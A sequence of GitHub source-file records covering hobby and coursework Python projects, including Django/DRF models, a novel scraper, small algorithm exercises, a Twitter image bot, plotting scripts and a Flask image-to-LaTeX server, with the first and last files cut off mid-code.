noise\n\n decoded = self.encoder.inverse_transform(encoded)\n decoded = decoded[data.columns]\n\n return decoded\n\n def _get_structure_scorer(self) -> Any:\n return {\n \"k2\": estimators.K2Score,\n \"bdeu\": estimators.BDeuScore,\n \"bic\": estimators.BicScore,\n \"bds\": estimators.BDsScore,\n }[self.struct_learning_score]\n\n def _get_dag(self, X: pd.DataFrame) -> Any:\n scoring_method = scoring_method = self._get_structure_scorer()(data=X)\n if self.struct_learning_search_method == \"hillclimb\":\n return estimators.HillClimbSearch(data=X).estimate(\n scoring_method=scoring_method,\n max_indegree=self.struct_max_indegree,\n max_iter=self.struct_learning_n_iter,\n show_progress=False,\n )\n elif self.struct_learning_search_method == \"pc\":\n return estimators.PC(data=X).estimate(\n scoring_method=scoring_method, show_progress=False\n )\n elif self.struct_learning_search_method == \"tree_search\":\n return estimators.TreeSearch(data=X).estimate(show_progress=False)\n elif self.struct_learning_search_method == \"mmhc\":\n return estimators.MmhcEstimator(data=X).estimate(\n scoring_method=scoring_method,\n )\n elif self.struct_learning_search_method == \"exhaustive\":\n return estimators.ExhaustiveSearch(data=X).estimate()\n else:\n raise ValueError(f\"invalid estimator {self.struct_learning_search_method}\")\n\n def _fit(self, X: DataLoader, *args: Any, **kwargs: Any) -> \"BayesianNetworkPlugin\":\n df = X.dataframe()\n self.encoder.fit(df)\n\n dag = self._get_dag(df)\n\n network = BayesianNetwork(dag)\n network.fit(df)\n\n self.model = BayesianModelSampling(network)\n return self\n\n def _generate(self, count: int, syn_schema: Schema, **kwargs: Any) -> pd.DataFrame:\n def _sample(count: int) -> pd.DataFrame:\n vals = self.model.forward_sample(size=count, show_progress=False)\n\n return self._encode_decode(vals)\n\n return self._safe_generate(_sample, count, syn_schema)\n\n\nplugin = BayesianNetworkPlugin\n","repo_name":"bvanbreugel/deep_generative_ensemble","sub_path":"src/synthcity/plugins/generic/plugin_bayesian_network.py","file_name":"plugin_bayesian_network.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"34695923363","text":"from django.db import models\nfrom institution.models import Department\nfrom django.utils.translation import gettext as _\nfrom evaluator.models import Evaluator\nfrom django.db import models\nfrom applicant.models import Applicant,Reference\nfrom .utils import application_upload\nfrom django.core.validators import FileExtensionValidator\n\nclass MscProgramme(models.Model):\n title = models.CharField(_('Title'),max_length = 200)\n address = models.CharField(_('Address'),max_length=50)\n description=models.TextField(_('description'),null=True,blank=True)\n department=models.ForeignKey(Department,on_delete=models.CASCADE, verbose_name=_(\"Department\"))\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"MSC Programme\")\n verbose_name_plural = _(\"MSC Programmes\")\n\nclass MscFlow(models.Model):\n title = models.CharField(_('Title'),max_length = 200)\n msc_programme=models.ForeignKey(MscProgramme,on_delete=models.CASCADE,verbose_name=_(\"Msc Programme\"))\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"MSC Flow\")\n verbose_name_plural = _(\"MSC Flows\")\n\n\nclass Call(models.Model):\n title = models.CharField(_('Title'),max_length = 200)\n start_date=models.DateField(_('Start date'))\n end_date=models.DateField(_('End Date'))\n msc_programme=models.ForeignKey(MscProgramme,on_delete=models.CASCADE, verbose_name=_(\"Msc Programme\"))\n evaluators = models.ManyToManyField(\n Evaluator, blank=False)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"Call\")\n verbose_name_plural = _(\"Calls\")\n\nclass Application (models.Model):\n applicant=models.ForeignKey(Applicant,on_delete=models.CASCADE)\n call=models.ForeignKey(Call,on_delete=models.CASCADE)\n submission_date=models.DateField(_('Submission Date'),auto_now_add=True)\n comments=models.TextField(_('Comments'),null=True,blank=True)\n admitted=models.BooleanField(_('Admitted'),default=None,null=True,blank=True)\n reference=models.ForeignKey(Reference,on_delete=models.SET_NULL,null=True,blank=True)\n media_file = models.FileField(_('Media File'),upload_to=application_upload,validators=[FileExtensionValidator(allowed_extensions=['pdf'])])\n preferences = models.ManyToManyField(MscFlow,through='Preference',blank=True,related_name=\"waiting_applications\")\n admitted_flow=models.ForeignKey(MscFlow,on_delete=models.CASCADE,blank=True,null=True,related_name=\"admitted_application\")\n\n def __str__(self):\n return self.applicant.user.email+\" application\"\n\n class Meta:\n verbose_name = _(\"Application\")\n verbose_name_plural = _(\"Applications\")\n constraints = [\n models.UniqueConstraint(fields=['applicant', 'call'], name='unique call for applicant')\n ]\nclass Preference(models.Model):\n application = models.ForeignKey(Application, on_delete=models.CASCADE)\n flow = models.ForeignKey(MscFlow,on_delete=models.CASCADE)\n priority = models.PositiveIntegerField(_('Priority'),)\n\n class Meta:\n ordering = [\"priority\"]\n verbose_name = _(\"Priority\")\n verbose_name_plural = _(\"Priorities\")\n\n def __str__(self):\n return self.flow.title","repo_name":"Nisfeight8/mscApplications","sub_path":"mscApplications/msc/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"13374907934","text":"# 爬取的网站为斗破苍穹小说网\n# 本次demo主要是学习re模块的使用\n# 其中用的最多的是(.*?)语法,可以匹配括号里的任何内容\n# demo如下\n\n\nimport requests\nimport re\nimport time\n\nheaders = {\n 'User-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\n }\n\n# def openFile():\n# try:\n# f = open(' /Users/xulei2/Desktop/doupo.txt','a+')\n# except\n\nf = open('/Users/xulei2/Desktop/doupo.txt','a+')\n\ndef get_info(url):\n res = requests.get(url,headers=headers)\n if res.status_code == 200:\n contents = re.findall('

(.*?)

',res.content.decode('utf-8'))\n for content in contents:\n f.write(content+'\\n')\n else:\n pass\n\nif __name__ == '__main__':\n urls = ['http://www.doupoxs.com/doupocangqiong/{}.html'.format(num) for num in range(2,1665)]\n for url in urls:\n get_info(url)\n # time.sleep(1)\n f.close()","repo_name":"Metatronxl/Crawl_practice_collection","sub_path":"crawl_doupoxs_re/crawl_doupoxs_re.py","file_name":"crawl_doupoxs_re.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29994056223","text":"\"\"\"\n--------------------------------------------------------------------------------------------------\n File Name: hrms/ref_data_management/serializers.py\n Description: This module contains all API endpoints for the ref_data_management application.\n--------------------------------------------------------------------------------------------------\n\"\"\"\nfrom rest_framework import serializers\nfrom .models import (\n RefCountry,\n RefStateProvince,\n RefMaritalStatus,\n RefContactType,\n RefAddressType,\n RefGender,\n RefDepartment,\n RefDesignation,\n RefPerformanceRecStatus,\n RefRatingScale,\n RefTargetUnit,\n RefLeaveType,\n RefLeaveRequestStatus,\n RefLeaveRevisionType\n )\n\n\nclass AbstractBaseSerializer(serializers.ModelSerializer):\n class Meta:\n fields = \\\n [\n 'created_by',\n 'last_updated_by',\n 'deleted_status',\n 'created_date',\n 'deleted_date',\n 'created_date',\n 'last_updated_date'\n ]\n\n\nclass RefCountrySerializer(AbstractBaseSerializer):\n \"\"\"\n This module has the attributes of 'Country' model\n \"\"\"\n class Meta:\n model = RefCountry\n fields = \\\n [\n 'id',\n 'country_name',\n 'country_iso_code',\n 'country_code',\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefStateProvinceSerializer(AbstractBaseSerializer):\n \"\"\"\n This module has the attributes of 'state' model\n \"\"\"\n country_name = serializers.StringRelatedField(source='country', read_only=True)\n\n class Meta:\n model = RefStateProvince\n fields = \\\n [\n 'id',\n 'state_name',\n 'state_code',\n 'country',\n 'country_name'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefMaritalStatusSerializer(AbstractBaseSerializer):\n \"\"\"\n This module contains the serializer for the Marital Status Model.\n \"\"\"\n\n class Meta:\n model = RefMaritalStatus\n fields = \\\n [\n 'id',\n 'marital_status',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefContactTypeSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Employee Contact type model\n \"\"\"\n class Meta:\n model = RefContactType\n fields = \\\n [\n 'id',\n 'contact_type',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefAddressTypeSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Employee Address type model\n \"\"\"\n class Meta:\n model = RefAddressType\n fields =\\\n [\n 'id',\n 'address_type',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefGenderSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Gender model\n \"\"\"\n class Meta:\n model = RefGender\n fields = \\\n [\n 'id',\n 'gender_type',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefDepartmentSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Department model\n \"\"\"\n class Meta:\n model = RefDepartment\n fields = \\\n [\n 'id',\n 'department_name',\n 'department_code',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefDesignationSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Designation model\n \"\"\"\n class Meta:\n model = RefDesignation\n fields = \\\n [\n 'id',\n 'designation_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefTargetUnitSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Target Unit model.\n \"\"\"\n class Meta:\n model = RefTargetUnit\n fields = [\n 'id',\n 'target_unit',\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefPerformanceRecStatusSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Performance Record Status model.\n \"\"\"\n class Meta:\n model = RefPerformanceRecStatus\n fields = [\n 'id',\n 'status_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefRatingScaleSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Rating Scale model.\n \"\"\"\n\n class Meta:\n model = RefRatingScale\n fields = [\n 'id',\n 'rating_value',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefLeaveTypeSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for LEAVE TYPE model\n \"\"\"\n class Meta:\n model = RefLeaveType\n fields = \\\n [\n 'id',\n 'leave_type_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefLeaveRequestStatusSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for lEAVE REQUEST STATUS model\n \"\"\"\n\n class Meta:\n model = RefLeaveRequestStatus\n fields = \\\n [\n 'id',\n 'leave_request_status_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefLeaveRevisionTypeSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for lEAVE REVISION TYPE model\n \"\"\"\n\n class Meta:\n model = RefLeaveRevisionType\n fields = \\\n [\n 'id',\n 'leave_revision_type_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n","repo_name":"aravindskn/HRMS","sub_path":"ref_data_management/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"25461782825","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n \n def sum_root_to_leaf(self, root):\n paths = self.get_root_to_leaf_paths(root)\n nums = list(map(lambda x: self.path_to_number(x), paths))\n return sum(nums)\n \n # eg: [1, 0, 0] => 4\n def path_to_number(self, nums):\n nums = list(map(str, nums))\n s = ''.join(nums)\n return int(s, 2)\n \n def get_root_to_leaf_paths(self, root):\n p = root\n last_visited = None\n res = []\n stack = []\n \n while p or stack:\n if p:\n stack.append(p)\n p = p.left\n else:\n cur = stack[-1]\n if cur.right and cur.right != last_visited:\n p = cur.right\n else:\n if not cur.left and not cur.right: \n nums = list(map(lambda x: x.val, stack))\n res.append(nums)\n last_visited = stack.pop(-1)\n return res\n","repo_name":"yibwu/leetcode","sub_path":"src/sum_of_root_to_leaf_binary_numbers_1022.py","file_name":"sum_of_root_to_leaf_binary_numbers_1022.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28852460464","text":"#!/usr/bin/env python3\n\n\nwith open(\"./input.txt\", \"r\") as content:\n #For each line of the text file, strip the newline character, convert to integer, save to a list array\n lines = [line.rstrip('\\n') for line in content.readlines()]\n\n forwardList = []\n upList = []\n downList = []\n\n for line in lines:\n if \"forward\" in line:\n for chars in line:\n if chars.isdigit():\n forwardList.append(int(chars))\n\n if \"up\" in line:\n for chars in line:\n if chars.isdigit():\n upList.append(int(chars))\n \n if \"down\" in line:\n for chars in line:\n if chars.isdigit():\n downList.append(int(chars))\n\n forwardSum = sum(forwardList)\n upSum = sum(upList)\n downSum = sum(downList)\n\n height = (downSum - upSum) \n\n ans = (height * forwardSum)\n print(\"Part One Answer: \", ans)\n\n\n\n\n #---------------Part TWO-------------------\n\n \n horz = 0\n depth = 0\n aim = 0\n\n #Iterate Through List\n for line in lines:\n #If line contains forward, extract integer, add it to Horizontal, multiply current element integer by current aim and add it to Depth\n if \"forward\" in line:\n for chars in line:\n if chars.isdigit():\n horz += int(chars)\n depth += (aim * int(chars))\n\n #If Line contains up, extract integer, decrease aim\n if \"up\" in line:\n for chars in line:\n if chars.isdigit():\n aim -= int(chars)\n\n #If Line contains up, extract integer, increase aim\n if \"down\" in line:\n for chars in line:\n if chars.isdigit():\n aim += int(chars)\n\n\n#Multiply Depth by Horizontal\nprint(\"Part two answer: \", (depth*horz))\n","repo_name":"MikeAA97/AdventOfCode2021","sub_path":"Day2/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23312978545","text":"import os\nimport datetime\nimport time\n\nfrom notifier import *\nfrom source import *\n\n\nif __name__ == '__main__':\n sources = [FCPSSource(), TwitterSource(\"fcpsnews\", r'all +schools.+will +(.+)on +(.+)'), TwitterSource(\"RyanLMcElveen\", r'FCPS.*will(.+)(?:on|tomorrow|today)(.+)')]\n notifiers = [IRCNotifier((\"chat.freenode.net\",6667), \"fcpsbot\", [\"#fcpsbot\", \"#tjhsst\"], [\"sdamashek\", \"jwoglom\", \"fwilson\"]), TextNotifier([\"+15713582032\"])]\n\n if os.name == 'nt':\n notifiers.append(WindowsNotifier())\n\n for source in sources:\n source.poll()\n\n while True:\n for source in sources:\n if source.event != source.old_event:\n source.old_event = source.event\n delta = source.event.date - datetime.datetime.today()\n if delta.days >= 0:\n for n in notifiers:\n n.notify(source.event)\n time.sleep(1)","repo_name":"sdamashek/schoolbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"19744376015","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nfilename = '10.1e9y0.0152m.txt'\niDF = pd.read_table(filename, header=13, skipfooter=2, engine='python', delim_whitespace=True)\n\nprint(iDF.axes)\n\n\n# Plot HR-diagram\nplt.figure(dpi=300)\nplt.plot(10 ** iDF['logTe'], iDF['logL'], '.k')\nplt.title(filename[:-4])\nplt.grid()\nplt.xlim(7000,2000)\nplt.xlabel('Effective temperature')\nplt.ylabel('Log L/L_sun')\n# Sun properties\nplt.axvline(5772, ymin=0, ymax=1, linestyle='--', color='r')\nplt.axhline(0, xmin=0, xmax=1, linestyle='--', color='r')\n# Testing for exact values\n#plt.axvline(8050, ymin=0, ymax=1, linestyle='--', color='b')\n#plt.axhline(0.82, xmin=0, xmax=1, linestyle='--', color='b')\nplt.show()\n\n","repo_name":"kr4ften/astro_1_bonus","sub_path":"plotHR.py","file_name":"plotHR.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40424598429","text":"from PyQt4 import QtCore, QtGui\n\nfrom library.Completer import CStaticCompleterModel, CCompleter\nfrom library.LineEdit import CLineEdit\n\n\nclass CPolicySerialEdit(CLineEdit):\n seriesList = None\n\n @staticmethod\n def getSeriesList():\n if CPolicySerialEdit.seriesList is None:\n db = QtGui.qApp.db\n result = []\n try:\n query = db.query('SELECT DISTINCT serial FROM Organisation_PolicySerial WHERE serial != \\'\\' ORDER BY serial')\n while query.next():\n result.append(query.value(0))\n except:\n pass\n CPolicySerialEdit.seriesList = result\n return CPolicySerialEdit.seriesList\n\n\n def __init__(self, parent=None):\n super(CPolicySerialEdit, self).__init__(parent)\n self.__completerModel = CStaticCompleterModel(self, self.getSeriesList())\n self.__completer = CCompleter(self, self.__completerModel)\n self.setCompleter(self.__completer)\n self.connect(self.__completer, QtCore.SIGNAL('highlighted(QString)'), self.onCompleterHighlighted)\n\n\n def focusOutEvent(self, event):\n currentCompletion = self.__completer.currentCompletion()\n if QtCore.QString.compare(self.text(), currentCompletion, QtCore.Qt.CaseInsensitive) == 0:\n self.setText(currentCompletion)\n# self.setInsurerFilter(currentCompletion)\n super(CPolicySerialEdit, self).focusOutEvent(event)\n\n# def setInsurerFilter(self, text):\n# pass\n\n def onCompleterHighlighted(self, text):\n self.emit(QtCore.SIGNAL('textEdited(QString)'), text)\n","repo_name":"dio4/vista_1","sub_path":"Registry/PolicySerialEdit.py","file_name":"PolicySerialEdit.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15565049508","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2018-01-20 14:28:18\n# @Author : anxi.xue (xueanxi@163.com)\n# @Version : $Id$\n\nimport os\nimport platform\nimport logging\n\n# 获得当前文件的路径\ncurrentFilePath = os.getcwd()\nprint('currentFilePath is ', currentFilePath)\n# 获得当前文件的父路径\nparentPath = os.path.abspath(os.path.dirname(currentFilePath) + os.sep + '.')\nprint('parentPaht = ', parentPath)\n# 获得当前文件的父路径的父路径\nparentPath2 = os.path.abspath(os.path.dirname(currentFilePath) + os.sep + '..')\nprint('parentPath2 = ', parentPath2)\n# 三个点,不是三重父路径,而是和一个点一样\nparentPath3 = os.path.abspath(\n os.path.dirname(currentFilePath) + os.sep + '...')\nprint('parentPath3 = ', parentPath3)\n\n# 创建log路径\nlogfileName = 'log.txt'\nlogFolderNme = 'log'\nlogFolderPath = os.path.join(currentFilePath, logFolderNme)\nprint('logfolder path:', logFolderPath)\nif os.path.exists(logFolderPath):\n print('log folder is exist, not should create.')\nelse:\n print('create log folder...')\n os.mkdir(logFolderPath)\n\n# 指定Log文件\n# os.path.join()方法可以把你输入的路径拼成当前操作系统可用的路径\nlogfilePath = os.path.join(currentFilePath, logFolderNme, logfileName)\nprint('log file: ', logfilePath)\n\n# 配置log信息\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s : %(levelname)s : %(message)s',\n filename=logfilePath,\n filemode='a') # a是追加模式,w是写入\n\nlogging.debug('start logging ...')\nlogging.warning('logging warning ...')\nlogging.error('logging error ...')\n","repo_name":"xueanxi/learnAi","sub_path":"test/37_logging.py","file_name":"37_logging.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38399292093","text":"from itertools import permutations\n\nT = int(input())\n\n\ndef permutation(idx, total):\n global ans # idx == N 되어 해당 순열의 합 계산할 때, ans보다 작으면 갱신해줘야 하므로 global 활용\n\n if idx == N: # 순열 완성\n if total < ans:\n ans = total\n return\n\n if total >= ans:\n return\n\n for i in range(N):\n if check[i] == 0:\n sel[idx] = i\n check[i] = 1\n # total += data[idx][sel[idx]] 함수에서 더하면 아래서 빼주지 않아도 됨\n permutation(idx + 1, total + data[idx][sel[idx]])\n # total -= data[idx][sel[idx]]\n check[i] = 0\n\n\nfor tc in range(1, T + 1):\n N = int(input())\n data = [list(map(int, input().split())) for _ in range(N)]\n\n ans = 10 * N # 각 숫자가 10 미만 자연수이므로 무조건 10*N보다 작음\n\n for_permutation = list(range(N))\n sel = [0] * N # 순열을 만들어줄 리스트. sel[idx]는 data[idx]의 column 인덱스\n check = [0] * N # 현재 순열에 들어가있는 숫자 체크 위한 리스트\n\n permutation(0, 0)\n\n # for permutation in permutations(for_permutation, N):\n # temp = 0\n # for i in range(N):\n # temp += data[i][permutation[i]]\n # if temp >= ans:\n # break\n # if temp < ans:\n # ans = temp\n\n print(\"#{} {}\".format(tc, ans))\n","repo_name":"LeeSungRyul/TIL","sub_path":"Algorithm/SWEA/D2/4881_d2_배열최소합.py","file_name":"4881_d2_배열최소합.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4877762945","text":"import time\nimport credentials\nimport tweepy\nimport random\nimport requests\nimport shutil\nfrom tweepy import OAuthHandler\nimport os\nauth = OAuthHandler(credentials.consumer_key, credentials.consumer_secret)\nauth.set_access_token(credentials.access_token, credentials.access_token_secret)\napi = tweepy.API(auth)\n\ndef imageTweet():\n #carpeta con imagenes\n carpeta = 'images/'\n #lista de imagenes\n imagenes = [f for f in os.listdir(carpeta) if os.path.isfile(os.path.join(carpeta, f))]\n #seleccionar una imagen aleatoria\n imagen = random.choice(imagenes)\n #ruta de la imagen\n ruta = carpeta + imagen\n #tweet con la imagen\n print(\"Enviando tweet con imagen... ⏰\")\n time.sleep(3)\n api.update_with_media(ruta)\n print(\"Tweet con imagen enviado con éxito ✅\")\n time.sleep(3)\n #borrar imagen?\n print(\"Borrar imagen? (s/n)\")\n rta = input()\n if rta == \"s\":\n print(\"Borrando imagen... ⏳\")\n time.sleep(3)\n os.remove(ruta)\n print(\"Imagen borrada 🚮\")\n time.sleep(3)\n return\n else:\n print(\"Imagen no borrada 😁\")\n return\n ","repo_name":"YasarChavez/Bot-Twitter","sub_path":"imageTweet.py","file_name":"imageTweet.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26612088650","text":"'''\nAuthor: Aadil Hussain\nBuilt on: Python 3.10.8\n'''\nimport random\n\n# For Homework to complete for tomrrow:\n# Bootcamp P2: 054,071,073,075\n\n# 054\nuser_sel = input(\"pick heads or tails[H or T]: \").lower()\nif user_sel == random.choice([\"h\", \"t\"]):\n print(\"You win!\")\nelse:\n print(f\"Sorry you lose! The computer chose {random.choice(['heads', 'tails'])}\")\n\n# 071\nsports = [\"baseball\", \"basketball\"]\nsports.append(input(\"what is your fav sport?: \").lower())\nsports.sort(); print(sports)\n\n# 073\nfav_foods = {}\nfor i in range(3):\n fav_foods[i] = input(f\"enter favorite food {i}: \")\nprint(fav_foods)\nfav_foods.pop(input(\"which number do you want to remove?: \"))\nprint(fav_foods)\n\n# 075\nrand_nums = []\nfor i in range(3):\n rand_nums.append(random.randint(100, 999))\nfor item in rand_nums:\n print(item)\ntry:\n rand_nums.index(int(input(\"enter a three-digit number\")))\nexcept ValueError:\n print(\"That is not on the list\")\n","repo_name":"Aulteran/Course-ICS4U-Notes","sub_path":"Unit 1 Bootcamp Assignments/P2_054_071_073_075.py","file_name":"P2_054_071_073_075.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74577139448","text":"from copy import deepcopy\n\nfrom matplotlib import pyplot as plt\nimport csv\nimport numpy as np\n\ndataset = 2\n\n# 结构体定义\nclass Metrics:\n fusion_node_name: str\n gpu_limit: int\n cpu_limit: int\n max_cpu_usage: int\n avg_latency: float\n pass\n\n\n# let error data in box plot also be considered inside the quarter\ndef adjust_dataset(data):\n # 找到每个数据集的上下四分位和异常值\n new_data = []\n outliers = [[] for _ in range(len(data))]\n\n for i, dataset in enumerate(data):\n Q1 = np.percentile(dataset, 25)\n Q3 = np.percentile(dataset, 75)\n IQR = Q3 - Q1\n\n lower_bound = Q1 - 1.5 * IQR\n upper_bound = Q3 + 1.5 * IQR\n\n # 确定异常值\n outliers[i] = [value for value in dataset if value < lower_bound or value > upper_bound]\n # 结合原始数据和异常值\n combined_data = np.concatenate((dataset, outliers[i]))\n\n new_data.append(combined_data)\n return new_data\n\n\ndef get_confidence_interval(data, confidence=0.95):\n from scipy.stats import sem, t\n means, confidence_intervals = [], []\n for dataset in data:\n mean = np.mean(dataset)\n std_err = sem(dataset)\n ci_range = std_err * t.ppf((1 + confidence) / 2, len(dataset) - 1)\n\n means.append(mean)\n confidence_intervals.append(ci_range)\n return confidence_intervals\n\n\ndef getLatency(node_name, gpu_limit, cpu_limit, exclude_first=True):\n with open(\n 'D:\\学术资料\\硕士\\CS 7638 AI Techniques for Robotics\\Project\\RL_Introduction\\MetricsAnalyse\\data\\CompleteTask'\n '\\detail_metrics\\\\full_task\\\\{0}\\latencies_{1}_{2}_{3}.csv'\n .format(dataset, node_name, gpu_limit, cpu_limit),\n 'r') as file:\n\n in_latencies = []\n if exclude_first:\n file.readline()\n while True:\n num = file.readline()\n if num == \"\":\n break\n in_latencies.append(float(num))\n return in_latencies\n\n\ncpu_limits = {\n \"as1\": list(range(400, 3200, 200)),\n \"controller\": list(range(1000, 5200, 200))\n}\ngpu_limits = [33, 50, 100]\ntotal_medians = []\ntotal_confidences = []\nlatencies = {\n \"as1\": [],\n \"controller\": []\n}\nlatencies_map = {\n 33: deepcopy(latencies),\n 50: deepcopy(latencies),\n 100: deepcopy(latencies)\n}\nfor fusion_node in cpu_limits.keys():\n for gpu_limit in gpu_limits:\n for cpu_limit in cpu_limits[fusion_node]:\n latencies_map[gpu_limit][fusion_node].append(getLatency(fusion_node, gpu_limit, cpu_limit))\nmedians = {\n \"as1\": [],\n \"controller\": [],\n}\n\nmedians_map = {\n 33: deepcopy(medians),\n 50: deepcopy(medians),\n 100: deepcopy(medians)\n}\n\nfor fusion_node in cpu_limits.keys():\n for gpu_limit in gpu_limits:\n for i, cpu_limit in enumerate(cpu_limits[fusion_node]):\n medians_map[gpu_limit][fusion_node].append(np.median(latencies_map[gpu_limit][fusion_node][i]))\n\nconfidence = {\n \"as1\": [],\n \"controller\": [],\n}\n\nconfidence_map = {\n 33: deepcopy(medians),\n 50: deepcopy(medians),\n 100: deepcopy(medians)\n}\n\nfor fusion_node in cpu_limits.keys():\n for gpu_limit in gpu_limits:\n for i, cpu_limit in enumerate(cpu_limits[fusion_node]):\n confidence_map[gpu_limit][fusion_node].append(\n get_confidence_interval([latencies_map[gpu_limit][fusion_node][i]])[0])\n\nfor gpu_limit in gpu_limits:\n for fusion_node in cpu_limits.keys():\n print(cpu_limits[fusion_node])\n print(medians_map[gpu_limit][fusion_node])\n plt.plot(cpu_limits[fusion_node], medians_map[gpu_limit][fusion_node], label=fusion_node)\n plt.errorbar(cpu_limits[fusion_node], medians_map[gpu_limit][fusion_node],\n yerr=confidence_map[gpu_limit][fusion_node], fmt='o', capsize=5, capthick=1,\n ms=2, label=fusion_node)\n plt.title(\"GPU limit is \" + str(gpu_limit))\n plt.legend()\n plt.show()\n plt.close()\n","repo_name":"MChen2333/k8s-based-resource-management-platform","sub_path":"MetricsAnalysis/compare_node.py","file_name":"compare_node.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72744373690","text":"#import io\n#import io\nfrom skimage import io\nimport json\n#import os\n#\n#os.environ['KMP_DUPLICATE_LIB_OK']='True'\n\nfrom torchvision import models\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom flask import Flask, jsonify, request, Response\nfrom resnet_custom import *\nfrom image2latex_model import Image2LatexModel\nfrom data_management import *\nfrom render import *\nimport numpy as np\nfrom cv2 import IMREAD_COLOR, imdecode\n\n#from pdflatex import PDFLaTeX\n\n\napp = Flask(__name__)\nstring_numerizer = StringNumerizer('latex_vocab.txt')\nmodel = Image2LatexModel(index2word=string_numerizer.idx2sym,\n word2index=string_numerizer.sym2idx,\n use_transformer_encoder=False)\nmodel.eval()\n\nmodel_info = torch.load(\"epoch_4_no_transenc.pth\", map_location=torch.device('cpu'))\nmodel.load_state_dict(model_info)\n\ndef transform_image(image):\n input_transforms = [transforms.ToTensor()]\n my_transforms = transforms.Compose(input_transforms)\n# image = Image.open(file) # Open the image file\n# image = img\n image = image.transpose((2, 0, 1))\n timg = torch.FloatTensor(image) # Transform PIL image to appropriately-shaped PyTorch tensor\n \n timg.unsqueeze_(0)\n return timg\n\n\ndef get_prediction(file):\n tensor = transform_image(file)\n# print(tensor)\n return model.predict(tensor)\n \ndef root_dir(): # pragma: no cover\n return os.path.abspath(os.path.dirname(__file__))\n\ndef get_file(filename): # pragma: no cover\n try:\n src = os.path.join(root_dir(), filename)\n # Figure out how flask returns static files\n # Tried:\n # - render_template\n # - send_file\n # This should not be so non-obvious\n return open(src).read()\n except IOError as exc:\n return str(exc)\n \n@app.route('/predict', methods=['POST'])\ndef predict():\n# print(request.data)\n# print(request.files['image'].read())\n \n \n# if request.method == 'POST':\n# file = request.files['file']\n file = request.files['image'].read()\n npimg = np.frombuffer(file, np.uint8)\n img=imdecode(npimg,IMREAD_COLOR)\n# print(img)\n \n labels = get_prediction(img)\n labels.squeeze_()\n# 